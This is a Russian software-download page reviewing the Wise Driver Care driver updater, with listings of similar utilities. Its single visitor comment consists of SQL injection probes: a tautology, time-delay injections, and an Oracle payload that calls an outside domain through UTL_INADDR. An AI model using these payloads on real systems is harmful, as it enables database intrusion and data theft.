» » Wise Driver Care - обновление драйверов Windows.

Программы для Windows


Wise Driver Care - обновление драйверов Windows.

Категория: Драйвера

Wise Driver Care - обновление драйверов Windows.


Wise Driver Care – программный продукт поможет устранить пользователю все проблемы с драйверами. Самостоятельное обновление и поиск актуальных драйверов – трудоемкий процесс. С помощью приложения с этой задачей пользователь сможет справиться в несколько кликов. Единственный значимый минус ПО – отсутствие русификации. Но приложение обновляется, поэтому на мультиязычность утилиты рассчитывать стоит.

Программа для драйверов не умеет распознавать ошибки и потери данных, которые происходят вследствие использования устаревших или неподходящих драйверов. Wise Driver Care умеет сканировать систему и обнаруживать «железо», которую нужно обновить. А работает оно исправно или действительно ухудшает работоспособность системы, с 100% точностью вы узнать не сможете.

Следующий недостаток – это относительно долгий процесс сканирования, который может занимать 5-10 минут. После установки и запуска приложения разбираться в ней не приходится – перед вами пусть и не русифицированный, но простейший интерфейс, в котором есть одна главная кнопка. Клик по ней запускает процедуру сканирования.

Главное преимущество программы для обновления драйверов - это возможность утилиты определять драйвера, которые не должны быть установлены на вашей ОС. Например, если стоит железо для 32-х битной системы, а у вас 64-х битная система, утилита сможет найти подходящие драйвера. Как только железо будет установлено, утилита уведомит вас, что Windows нужно перезагрузить.

Обратите внимание на пункт в интерфейсе «Rescue Center» - если вы боитесь потерять драйвера, можно сделать их резервную копию. Необязательно выбирать все железо. Можно поставить галочки напротив интересующих вас драйверов. Это отличная функция, которая пригодится, если вы решите переустановить ОС без потери актуального и рабочего железа.

После сканирования Wise Driver Care дает общую оценку производительности. Оценивается производительность видеокарты, процесса, материнской платы, жесткого диска и других важных составляющих ПК. Насколько объективно оценочное мнение, сказать нельзя. Поскольку, если система обнаружит сбои, она уведомит пользователям об этом, но не предоставит источник сбоев.

Если отсутствует подключение к интернету, не работает звук, не запускается стандартный софт, можно попробовать решить проблему через ОС. Но если проблема заключается не в драйверах, Wise Driver Care вас не выручит. Для тех кто решил установить или обновить драйвера, можно смело скачать Wise Driver Care и в несколько кликов выполнить апгрейд драйверов.

Ссылка на загрузку

Версия: 1.0.620.1001b
Разработчик: wisecleaner
Год релиза: 2017
Поддерживаемые ОС: Windows 7, 10, XP, 8.
Языки интерфейса: Русский
Размер файла: 6.91 Мб


Похожие бесплатные программы:

Double Driver 4.1
Double Driver представляет собой менеджер драйверов для ОС Windows. Данная утилита позволяет быстро просмотреть все установленные на ПК драйвера и восстанавливать их, если потребуется. Более того, ....

Advanced Driver Updater 2.7 установщик драйверов.
Обновилась версия программы Advanced Driver Updater для работы с драйверами, функционал программы позволит, просканировать и установить неизвестные или обновить устаревшие драйвера. А благодаря ....

IObit Driver Booster обновление драйверов на ПК.
IObit Driver Booster является отличным инструментом, который позволит вам всегда находить новые версии драйверов для ваших устройств. Программа сканирует ваши устройства и обновляет их драйвера в ....

Wise Care 365 Pro + ключ - быстрая оптимизация ПК.
С целью быстрого и легкого процесса оптимизации функционирования компьютера, современные профессионалы рекомендуют пользоваться пакетом инструментов Wise Care 365 Pro. Это программный инструмент, ....



Коментарии



Smith | Гости

3[left][/left][center][/center][right][/right]
Внимание! У вас нет прав для просмотра скрытого текста.


NS09<s1﹥DBLʺSNGLʹNS09

-1' OR 1=1 OR '1'='1

(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('dyr3ifv6rafhduf3q-ego_sslnxqp3zn_1jbf0lu'
||'ria.r87.me') from DUAL))))

1)) WAITFOR DELAY '0:0:25'-- /* 7616458b-d07b-4f37-a857-7167260754ad */

1');SELECT pg_sleep(25)-- /* 3f3446a6-34de-4da0-a1e1-3eba1c2d5362 */
11 октября 2022 19:09
Панель добавления отзыва
Ваше Имя:


Ваш E-Mail:



Мне нравится Relizua
Группа Вконтакте